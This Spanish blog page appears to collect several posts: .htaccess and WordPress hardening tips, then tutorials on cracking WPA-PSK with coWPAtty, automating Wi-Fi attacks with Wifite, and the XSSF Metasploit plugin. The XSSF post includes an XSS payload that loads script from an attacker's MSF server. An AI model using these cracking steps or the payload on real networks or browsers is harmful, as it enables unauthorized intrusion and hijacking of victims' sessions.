  3. allow from all
  4. deny from 123.123.123.1
  5. deny from 555.555.555.5
  6. deny from 000.000.000.0
  7. </Limit>

Crear un registro de errores de PHP

Mientras desarrollabas tu sitio usando PHP o quizá navegando por red, es probable que te hayas encontrado con una página que imprimía algún error de PHP como parte de la "decoración". Estos errores, además de ser desagradables para el usuario común, puede brindar información sensible que puede ser aprovechada por un visitante malintencionado. Para evitar que se impriman en pantalla y, por el contrario, se registren en una bitácora dentro del servidor podemos usar el código a continuación.

Código: Text
  1. # evitar que los errores se muestren al usuario
  2. php_flag display_startup_errors off
  3. php_flag display_errors off
  4. php_flag html_errors off
  5. # registrar errores en la bítacora
  6. php_flag log_errors on
  7. php_value error_log /logs/php_error.log

Redireccionar dispositivos móviles

Si tu sitio no tiene un diseño sensible (responsive web design), quizá te resulte de gran utilidad redirigir el tráfico hacia una versión especialmente preparada para dispositivos móviles.

Código: Text
  1. RewriteEngine On
  2. RewriteCond %{REQUEST_URI} !^/m/.*$
  3. RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
  4. RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
  5. RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
  6. RewriteCond %{HTTP_USER_AGENT}  "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
  7. RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
  8. RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
  9. RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
  10. RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
  11. RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
  12. RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp" [NC]
  13. #------------- La siguiente linea excluye al iPad de la lista
  14. RewriteCond %{HTTP_USER_AGENT} !^.*iPad.*$
  15. #-------------
  16. RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] #*SEE NOTE BELOW
  17. RewriteRule ^(.*)$ /m/ [L,R=302]

Soporte para vídeos en HTML5

Una de las principales características de HTML5, es la capacidad de reproducir vídeos sin la necesidad de usar plugins, y muchos están aprovechando esta ventaja en sus sitios. Sin embargo, es posible que existan algunos problemas con ciertos formatos de vídeo a la hora de reproducirlos. Alguien que se enfrentó a este inconveniente nos ofrece una solución que utiliza .htacces.

Código: Text
  1. RewriteCond %{REQUEST_FILENAME} !-f
  2. RewriteCond %{REQUEST_FILENAME} !-d
  3. RewriteCond %{REQUEST_URI} !=/favicon.ico
  4. AddType video/ogg .ogv
  5. AddType video/ogg .ogg
  6. AddType video/mp4 .mp4
  7. AddType video/webm .webm
  8. AddType application/x-shockwave-flash swf

Redirecciones 301

Si quieres realizar un cambio de dominio o redirigir el tráfico de una o varias páginas de tu sitio sin ser penalizado por Google -y probablemente otros buscadores-, las redirecciones 301 son la mejor opción. El código .htacces para esto es el siguiente:

Código: Text
  1. Redirect 301 /d/file.html http://www.domainname.com/r/file.html

Proteger un archivo específico

Los servidores almacenan diferentes archivos que guardan la configuración para el funcionamiento del sitio, muchos de estos contienen nombres de usuarios, rutas a bases de datos y contraseñas, información sensible que puede utilizar un usuario malintencionado para poner en jaque la integridad y seguridad de nuestro sitio. Para agregar una capa extra de seguridad y apartar estos archivos de los "curiosos", podemos usar el siguiente método para lanzar un código de error 403. Suponiendo que queremos proteger el archivo wp-config.php de una instalación de WordPress, el código sería:

Código: Text
  1. <Files wp-config.php>
  2. order allow,deny
  3. deny from all
  4. </Files>

Proteger un directorio con contraseña

Con .htaccess también es posible proteger un archivo o directorio completo usando una contraseña. Los códigos para ambos casos se muestran a continuación:

Código: Text
  1. #Proteger un archivo con contraseña
  2. <files secure.php="">
  3. AuthType Basic
  4. AuthName "Prompt"
  5. AuthUserFile /home/path/.htpasswd
  6. Require valid-user
  7. </files>
  8.  
  9. #Proteger un directorio con contraseña
  10. resides
  11. AuthType basic
  12. AuthName "This directory is protected"
  13. AuthUserFile /home/path/.htpasswd
  14. AuthGroupFile /dev/null
  15. Require valid-user

Debes prestar especial atención al archivo .htpasswd ya que este almacena toda la información relacionada con la autenticación de los usuarios.

Remover www de las URLs de tu sitio

Para convertir http://www.tusitio.com en http://tusitio.com, basta con agregar el siguiente código a tu archivo .htaccess.

Código: Text
  1. #remover www de la URL
  2. RewriteEngine On
  3. RewriteCond %{HTTP_HOST} ^www\.domain\.com$ [NC]
  4. RewriteRule ^(.*)$ http://domain.com/$1 [L,R=301]
  5.  

Con esto llegamos al final de este pequeño, pero útil e interesante recorrido por el mundo .htaccess. Las dudas y comentarios son siempre bienvenidos y esperamos poder brindar ayuda adicional a través de esta vía.

Fuente: bitelia

Como fortalecer la seguridad en WordPress

8:20 0 Comments A+ a-


 La seguridad en servidores y plataformas web es un aspecto muy importante, pero que no todos los administradores tienen en cuenta, o incluso no se toman el tiempo suficiente para configurar. Manteniendo nuestro servidor actualizado y realizando las configuraciones correspondientes de seguridad podremos proteger la privacidad, integridad y disponibilidad de los recursos que están bajo el control del administrador del servidor.
Algunas características a tener en cuenta a la hora de contratar un hosting son:
  • Proveedor que se preocupe por la seguridad en sus procesos y productos
  • Que proporcione las últimas versiones más estables de todo el software del servidor.
  • Métodos confiables de copias de seguridad y restauración de las mismas.
Entre las preguntas frecuentes que surgen a la hora de asegurar nuestra información podemos destacar dos: qué datos hace falta que asegure y a través de qué metodologías. Uno de los aspectos fundamentales son las vulnerabilidades, por lo que, en primer lugar, debemos asegurarnos de que el sistema operativo que brindará el servicio esté libre de malware, ya que una infección podría comprometer el rendimiento y el servicio. Este punto se encadena con la disponibilidad de una solución antivirus actualizado. Y por último, es necesario contar con todas las actualizaciones del sistema operativo, ya que un sistema desactualizado puede exponer fallas o agujeros de seguridad que se convierten en posibles vías de explotación para un atacante. Algunas buenas prácticas a la hora de configurar WordPress son:
  • Mover el directorio wp-content: esta acción ayuda a proteger al sitio contra ataques automatizados Zero Day.
  • Cambiar el nombre de usuario admin: este usuario es el que viene por defecto, por lo que es uno de los primeros objetivos de un cibercriminal a la hora de realizar un ataque de fuerza bruta. En las versiones más recientes de WordPress, es posible seleccionar el nombre de usuario durante la instalación.
  • Mínima instalación de plugins: muchos de éstos son susceptibles a Cross-Site Scripting (XSS) e inyección de SQL; si se instalan pocos plugins se reducirán vectores de ataques.
  • Mover wp-config.php fuera del directorio raíz web: si movemos este archivo una carpeta más arriba del directorio web raíz, lograremos que no se vea la configuración de nuestro WordPress.
  • Quitar el listado de directorios en el servidor: WordPress sufre Full Path Disclosure lo que ayuda a realizar ataques como Path Transversal.
  • Administración a través de SSL: a veces, el panel de administración se usa por protocolo sin cifrar HTTP, pero si ingresamos mediante HTTPS estamos enviando los datos encriptados, lo que dificulta la intercepción de información y evita ataques de tipo MITM.
  • Usar la base de datos sin privilegios de administrador cuando no se requiere: por defecto WordPress solo usa una base de datos de usuarios para todos ellos. Pero con algunos ajustes de código se puede usar un usuario de una base con menos privilegios para usuarios anónimos, lo que reduce considerablemente los riesgos.
  • Mantener usuarios con privilegios mínimos: existe la posibilidad de que un usuario con privilegios de administrador tenga una contraseña débil. Concediendo a los usuarios los privilegios indispensables se reducen las posibilidades de que se vean comprometidas sus cuentas.
  • Sacar el “Powered by WordPress” del pie de página: los ciberdelincuentes usan este pie de página en buscadores para encontrar potenciales víctimas vulnerables.
  • Lista blanca de IP para acceder al wp-login.php: generalmente los administradores acceden a su blog desde la misma dirección IP, por lo que se configuran estas direcciones como “de confianza” para poder acceder.
Una última consideración sería contar con un sistema de detección de intrusos, lo que nos va a permitir reaccionar mucho más rápido ante un incidente y por supuesto no almacenar las copias de seguridad en directorios públicos, para evitar que los atacantes descarguen esta información,   pudiendo así aplicar informática forense para obtener información sensible.

coWPAATTY (Romper cifrados WPA-PSK)

8:02 0 Comments A+ a-


CoWPAATTY


coWPAATTY es una herramienta para crackear WPA-PSK, creado por Joshua Wright http://www.willhackforsushi.com/?page_id=50 posee todas las cualidades que se podria pedir, requiere como minimo, una o dos tramas, o dos y tres de las tramas del acuerdo de cuatro vias para comenzar a crackear.
Lanzar un ataque de diccionario con e es muy facil:


especificamos nuestro diccionario con (-f) el SSID de la Red (-s) y el archivo de captura con (-r) y por ultimo (-2) lo que habilita el modo no estricto, algo que es requerido cuando proporcionamos una captura que contiene menos de las cuatro vias.
* Una interesante caracterisitca de coWPAATTY es que recoge la lista de frases de paso desde la entrada estandar (stdin) esta funcion es muy eficaz ya que podemos combinarla con herramientas que van a realizar las permutaciones de palabras, como John the Ripper, que lo pueden encontrar en: www.openwall.com/john


Instalacion:
1.- Descargar: http://www.willhackforsushi.com/?page_id=50
2.- descomprimir: tar zxf (nombre del archivo)
3.- Instalamos dependencias:
apt-get install libssl-dev
apt-get install libpcap0.8-dev
apt-get install libdigest-hmac-perl
4.- instalamos: nos ubicamos en el directorio en el que se encuentra coWPAATTY y tecleamos:  make; luego -> aptitude install build-essential -> sudo cp cowpatty /usr/bin

Wifite - Automatizador de ataques WIFI

8:00 0 Comments A+ a-



Interpretando Wifite
Una vez descargado, nos ubicaremos con la consola en la dirección del wifite y tipeamos lo siguiente para interpretarlo:
Python wifite.py


Seguido a esto, podremos ver una interface agradable, que nos facilitara su uso.
Configuración de parámetros.


Pasare a explicar rápidamente que es cada cosa y qué función cumple.

Interface: Es nuestra tarjeta de red
Encryption type: Son los tipos de redes que scanneara wifite. En mi caso puse para que scannee y busque redes con encriptación WEP y WPA.
Channel: Canal. Seleccionamos un canal en el cual queramos que busque. En este caso colocare para que scannee en todos los canales, ya que es un scanneo general.
Select targets from list: Esta opción permite seleccionar manualmente una vez que finalice el scanneo la red que yo quiera desencriptar.
Dictionary: Diccionario que usara wifite para desencriptar las redes de tipo WPA/WPA2
Wep timeout: Tiempo límite que durara cada ataque. En este caso capturara DATAs por 10 minutos.
Wpa timeout: Tiempo límite que durara en capturar el handshake.
Wep options: Opciones y tipos de ataques que tenemos disponibles para capturar DATAs en las redes con encriptación WEP.
Una vez configurado todo esto, presionamos el botón rojo “h4x0r 1t n40”

Scanneo y Ataque.
Al presionar el botón, automáticamente comenzara a scannear las redes.


Como vemos en la imagen me dice que hay 4 redes y 2 clientes conectados. Presionamos Ctrl+C para detener el scanneo y nos permitirá seleccionar la que nosotros queramos atacar.


Bueno, aca me dice las redes disponibles. Las dos primeras en verde son las que tienen mayor señal. Y las rojas son las que están mas alejadas.
Para este tutorial atacare la red numero 3 ya que es de tipo WEP ya que es más fácil de sacarle la contraseña.
Si queremos atacar todas las redes, escribimos all. Si queremos atacar todas menos la 3, escribimos 1-2,4-5
Y si queremos atacar solamente la 3, presionamos 3.


Como vemos en la imagen, presione 3 y comenzó a capturar DATAs. Empezó con el primer ataque que es un ataque ARP. Y lleva 1 ivs (Vector de Inicialización)
Lo dejamos trabajar solo por un rato, dice que como máximo tardara 40 minutos, ya que habíamos configurado anteriormente que duraría 10 minutos por ataque y al ser 4 tipos de ataques diferentes, demorara 40 minutos.

 
 
 
Como se puede apreciar, el programa sacó la contraseña en pocos minutos.
Esperamos que les sea de utilidad.
 

Xssf Metasploit Plugin

12:37 0 Comments A+ a-


Descripción:

El Cross-Site Scripting Framework (XSSF) Es una herramienta para explotar esta vulnerabilidad
Es muy facil de usar. El XSSF permite crear un canal de comunicacion con el browser del target al que atacaremos.
Esta herramienta se puede integrar dentro del Framework de Metasploit y permite a los usuarios de MSF lanzarlos desde el browser.





Instalación:

1 - Descargar la ultima version de Metasploit
2 - Actualizar Ruby
3 - Abrir una terminal y navegar hasta el directorio [ /opt/metasploit/../msf3 ]
4 - Descargar XSSF usando el siguiente repositorio:
[ svn export http://xssf.googlecode.com/svn/trunk ./ --force ]


Instrucciones:

1 - Iniciar Metasploit Framework (MSF Console)
2 - Cargar el plugin XSSF usando el comando: 'load xssf'
3 - Se puede modificar el puerto con el siguiente comando: 'load xssf Port=80'
4 - Para cambiar la URL se utiliza el siguiente comando: 'load xssf Uri=/'
5 - Ejemplo del ataque: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>


XSSF home:
[ https://code.google.com/p/xssf/ ]

Source Code:
[ https://code.google.com/p/xssf/source/browse/trunk/modules/?r=5#modules%2Fauxiliary%2Fxssf ]